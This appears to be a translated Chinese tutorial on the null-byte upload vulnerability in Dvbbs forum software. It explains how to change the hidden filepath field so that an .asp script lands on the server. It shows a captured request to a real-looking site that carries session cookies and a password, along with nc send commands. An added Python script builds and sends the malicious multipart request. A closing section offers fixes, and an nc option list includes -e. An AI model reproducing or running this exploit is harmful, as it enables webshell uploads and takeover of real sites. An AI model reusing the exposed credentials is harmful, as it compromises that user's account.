Probing into the PHP/ASP upload vulnerability

Source: Internet
Author: User
1: Tools used
The vulnerability, simply put, lets you upload an ASP or PHP script through the site's ordinary form-based file upload. Two tools are used below.
nc (netcat)
Used to submit the raw packet. Run it from a DOS/command prompt:
nc -vv www.***.com 80 < 1.txt
-vv: verbose (echo what is sent and received)
80: the web port
1.txt: the packet you want to send
(For more usage, see the other posts in this area and the appendix at the end.)
WSE (WSockExpert)
Monitors the local ports and captures the packet that IE submits.

2: The principle of the vulnerability
The following example assumes:
www host: www.***.com;
BBS path: /bbs/
The flaw comes from studying the file-upload code of Dvbbs (the "Dongwang" forum), and some programming experience helps to follow it.
Look at Dvbbs's upfile.asp; there is no need to read all of it.
upfile.asp receives the upload from a form like the following:
<form name="form" method="POST" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="Upload" ...></form>
Variables of interest:
filepath: default value uploadface, type hidden
act: default value upload, type hidden
file1: the file you are going to upload.
The key is the filepath variable!
By default our files are uploaded to www.***.com/bbs/uploadface/.
The file is named after your upload time; this is the line in upfile.asp that builds the name (formpath holds the filepath field):
filename = formpath & year(now) & month(now) & day(now) & hour(now) & minute(now) & second(now) & rannum & "." & fileext
--------------------------------------
We know that, in the computer, a string is terminated by a null byte (0x00). Anyone who knows C knows that
char data[] = "BBS"
gives an array of length 4: 'B', 'B', 'S', '\0'.
What happens if we construct filepath as follows?
filepath = "/newmm.asp" followed by a 0x00 byte
Suppose we upload at 2004-09-24 08:24. The saved file name changes as follows.
Unchanged:
http://www.***.com/bbs/uploadface/200409240824.jpg
With the filepath we constructed:
http://www.***.com/newmm.asp[0x00]/200409240824.jpg
When the server receives the filepath data, it finds the null byte right after newmm.asp and treats it as the end of the string: the VBScript concatenation keeps the byte, but the null-terminated file API the script hands the path to stops there, and the timestamp and extension are dropped.
So the .asp file we upload is saved as:
http://www.***.com/newmm.asp
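The following Python script is an added example (not code from the original article or from Dvbbs) that makes the null-terminator argument above concrete: it rebuilds the upfile.asp filename expression in Python, then shows what a NUL-terminated file API receives from the result by reading it back through ctypes.c_char_p, which stops at the first 0x00 exactly as strlen() does. The zero-padded timestamp, the random number 17 and the sample time are assumptions chosen to match the page's sample URL.

```python
import ctypes
from datetime import datetime

# Sample upload time matching the page's example (assumption).
SAMPLE_TIME = datetime(2004, 9, 24, 8, 24, 0)


def c_array_length(text: bytes) -> int:
    """Length of the C array `char data[] = "..."` for `text`: one extra byte for '\\0'."""
    return len(ctypes.create_string_buffer(text))


def build_filename(formpath: str, now: datetime, rannum: int, fileext: str) -> str:
    """Reproduce the Dvbbs upfile.asp expression in Python:

        filename = formpath & year(now) & month(now) & day(now) & hour(now)
                   & minute(now) & second(now) & rannum & "." & fileext

    VBScript's & is length-counted, so a 0x00 inside formpath survives
    concatenation; nothing in this step truncates. (Zero-padded fields are an
    assumption that matches the page's sample URL 200409240824.jpg.)
    """
    return f"{formpath}{now:%Y%m%d%H%M%S}{rannum}.{fileext}"


def as_seen_by_c_file_api(path: str) -> str:
    """What a NUL-terminated file API (the CRT/Win32 calls behind
    FileSystemObject and ADODB.Stream.SaveToFile) receives for `path`.

    ctypes.c_char_p.value reads bytes up to the first 0x00, like strlen().
    """
    return ctypes.c_char_p(path.encode("latin-1")).value.decode("latin-1")


if __name__ == "__main__":
    print("sizeof char data[] = \"BBS\":", c_array_length(b"BBS"))
    # Normal upload: filepath is the default uploadface directory.
    print(build_filename("/bbs/uploadface/", SAMPLE_TIME, 17, "jpg"))
    # Attacker's filepath: "/newmm.asp" followed by a 0x00 byte.
    evil = build_filename("/newmm.asp\x00", SAMPLE_TIME, 17, "jpg")
    print(repr(evil), "->", as_seen_by_c_file_api(evil))
```

The script prints the full concatenated name (with the embedded NUL) next to the truncated name the file system sees; the second is what actually lands on disk.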
3: Later supplement
After the vulnerability was disclosed, many sites made changes, but most of them still do not filter or sanitize filepath.
Many sites simply add n more hidden variables. That defeats the Upfile.exe tool published on the Internet (Veteran's tool, which exploits the filepath variable), but the basic problem is not fixed at all.
Website plug-ins have similar holes, so my advice is not to rely on a specific tool:
I changed the filepath variable in the packet captured with WSE and then submitted it with nc.
Even if the site adds n hidden variables, it does not help.
Of course, if filepath is strictly filtered, our theory ends here.
Then it is time for a new theory to be born!

4: Detailed example:
---------------------
One, WSE capture result (saved in 1.txt):
POST /bbs/upphoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upphoto/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=-----------7d423a138d0278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; Gamvancookies=1; Regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; Logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"

../medias/myphoto/
-----------------------------7d423a138d0278
... ...

Upload
-----------------------------7d423a138d0278--
Two, open 1.txt in UltraEdit and change the data:
......
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"

/newmm.asp█   <=== the black block stands for a space (0x20); change that byte to 0x00 and you are done
......
----------------------------
Three, recalculate Content-Length, then submit with nc:

nc -vv www.xin126.com 80 < 1.txt

UltraEdit is a hex editor that can be downloaded online.
We mainly use it to write that terminator byte: hex 0x00 (00h).
In fact, it is enough to append a single 00 byte right after the filepath value.

Recalculating the length ===> you changed filepath, so Content-Length grows or shrinks by the same number of bytes.
......
Host: www.xin126.com
Content-Length: 1969 <====== this is it.
Connection: Keep-Alive
Cache-Control: no-cache
......
How to count? Every letter or digit is one byte, and so is the 0x00 you inserted. Content-Length covers only the body, i.e. everything after the blank line that ends the headers.
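As an added example that is not part of the original post, this Python script performs the three steps above without a hex editor: it builds the multipart body with a 0x00 byte at the end of filepath, computes Content-Length from the body it actually sends (the recalculation the text asks you to do by hand), and can send the raw request the way nc does. The host, path, field names and the placeholder file contents are constructed for illustration; the boundary string is the one from the capture above, and the application/octet-stream Content-Type on the file part is an assumption.

```python
import socket

# Boundary reused from the WSE capture above (the header value, without the
# leading "--" that each delimiter line in the body adds).
BOUNDARY = "---------------------------7d423a138d0278"


def build_multipart_body(fields, file_field, file_name, file_bytes):
    """Build a multipart/form-data body. `fields` is a list of (name, value_bytes);
    the value bytes go in untouched, so a trailing 0x00 in filepath is preserved."""
    delim = ("--" + BOUNDARY).encode()
    parts = []
    for name, value in fields:
        parts.append(delim + b"\r\n" +
                     b'Content-Disposition: form-data; name="%s"\r\n\r\n' % name.encode() +
                     value + b"\r\n")
    parts.append(delim + b"\r\n" +
                 b'Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
                 % (file_field.encode(), file_name.encode()) +
                 b"Content-Type: application/octet-stream\r\n\r\n" + file_bytes + b"\r\n")
    parts.append(delim + b"--\r\n")          # closing delimiter
    return b"".join(parts)


def build_request(host, path, body, cookie=None):
    """Wrap the body in an HTTP/1.1 POST. Content-Length is computed from the
    body that is actually sent, so no manual recount is needed after edits."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    if cookie:
        headers.append(f"Cookie: {cookie}")
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


def content_length_delta(old_value: bytes, new_value: bytes) -> int:
    """By how much Content-Length must change when one field value is edited in
    place in 1.txt (the manual recount described in the text)."""
    return len(new_value) - len(old_value)


def send_raw(request: bytes, host: str, port: int = 80, timeout: float = 10.0) -> bytes:
    """The `nc -vv host 80 < 1.txt` step done from Python. Never called at import."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Constructed sample: filepath with the trailing NUL, placeholder file body.
    body = build_multipart_body(
        [("filepath", b"/newmm.asp\x00"), ("act", b"upload")],
        "file1", "photo.jpg", b'<% Response.Write("constructed placeholder") %>')
    req = build_request("www.***.com", "/bbs/upfile.asp", body)
    print(req.decode("latin-1"))
    print("Content-Length change vs ../medias/myphoto/:",
          content_length_delta(b"../medias/myphoto/", b"/newmm.asp\x00"))
```

Replacing the captured value ../medias/myphoto/ (18 bytes) with /newmm.asp plus the NUL (11 bytes) shortens the body by 7, so the captured 1969 would become 1962; the script sidesteps that arithmetic by measuring the body it builds.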

Solutions for the upload vulnerability (for reference only):

1. Upload scripts generally treat the upload path as a variable taken from the form.
===> Our fix is to make filepath a constant on the server side, never read from the request.
In my view this is currently the most effective method.

2. Strengthen the handling of the value: the original code stops reading at the terminator.
Instead, keep reading until where the next variable begins (the next boundary), then filter the whole value, null bytes included.
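To show the two fixes in code, here is an added Python sketch (illustrative, not Dvbbs code and not ASP): the upload directory is a server-side constant (fix 1), the multipart body is split on the boundary so a field value runs to the next part instead of stopping at a 0x00 (fix 2), and the saved name is rebuilt on the server from a timestamp plus an allow-listed extension. The field names filepath, act and file1 come from the form above; the directory name, extension list, sample boundary and sample bodies are constructed assumptions.

```python
import re

UPLOAD_DIR = "uploadface"                   # fix 1: a server-side constant, not a form field
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}  # assumption: image-only upload
SAMPLE_BOUNDARY = b"XBOUNDARYX"              # constructed boundary for the samples below


class UploadRejected(ValueError):
    pass


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Fix 2: split on the boundary so each value runs to where the next field
    begins. A 0x00 inside a value is kept, not treated as the end of it.
    Returns {field_name: (filename_or_None, value_bytes)}."""
    delim = b"--" + boundary
    fields = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):
            value = value[:-2]
        name = re.search(rb'[; ]name="([^"]*)"', head)      # matches name=, not filename=
        fname = re.search(rb'filename="([^"]*)"', head)
        if name:
            fields[name.group(1).decode("latin-1")] = (
                fname.group(1).decode("latin-1") if fname else None, value)
    return fields


def safe_target(fields: dict, stamp: str) -> str:
    """Where the upload is written. The client's filepath field is ignored; the
    name is rebuilt server-side from `stamp` plus an allow-listed extension."""
    for name, (fname, value) in fields.items():
        if fname is None and b"\x00" in value:   # text fields never legitimately hold NUL
            raise UploadRejected(f"null byte in field {name!r}")
    fname, _ = fields.get("file1", (None, b""))
    if not fname:
        raise UploadRejected("no file")
    if "\x00" in fname or "/" in fname or "\\" in fname:
        raise UploadRejected("bad filename")
    ext = fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    return f"{UPLOAD_DIR}/{stamp}.{ext}"


def sample_body(filepath: bytes, filename: bytes) -> bytes:
    """Constructed request body shaped like the WSE capture, with a 3-byte JPEG stub."""
    d = b"--" + SAMPLE_BOUNDARY + b"\r\n"
    return (d + b'Content-Disposition: form-data; name="filepath"\r\n\r\n' + filepath + b"\r\n"
            + d + b'Content-Disposition: form-data; name="act"\r\n\r\nupload\r\n'
            + d + b'Content-Disposition: form-data; name="file1"; filename="' + filename
            + b'"\r\nContent-Type: image/jpeg\r\n\r\n\xff\xd8\xff\r\n'
            + b"--" + SAMPLE_BOUNDARY + b"--\r\n")


if __name__ == "__main__":
    for fp, fn in ((b"/newmm.asp\x00", b"pic.jpg"), (b"../medias/myphoto/", b"pic.jpg"),
                   (b"uploadface", b"shell.asp")):
        fields = parse_multipart(sample_body(fp, fn), SAMPLE_BOUNDARY)
        print("filepath as parsed:", fields["filepath"][1])
        try:
            print("  -> saved as", safe_target(fields, "200409240824"))
        except UploadRejected as e:
            print("  -> rejected:", e)
```

The parser still sees the full value /newmm.asp plus 0x00, which is what makes the null-byte check possible; the original code never got that far because the string had already been cut.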

Appendix: nc usage:
Connecting to an external host:
nc [-options] hostname port[s] [ports] ...
Listening on the local host:
nc -l -p port [options] [hostname] [port]
Options:
-d            detach from console, stealth mode
-e prog       inbound program to exec [dangerous!!]
-g gateway    source-routing hop point[s], up to 8
-G num        source-routing pointer: 4, 8, 12, ...
-h            this cruft
-i secs       delay interval for lines sent, ports scanned
-l            listen mode, for inbound connects
-L            listen harder, re-listen on socket close
-n            numeric-only IP addresses, no DNS
-o file       hex dump of traffic
-p port       local port number
-r            randomize local and remote ports
-s addr       local source address
-t            answer TELNET negotiation
-u            UDP mode
-v            verbose [use twice to be more verbose]
-w secs       timeout for connects and final net reads
-z            zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: m-n [inclusive]


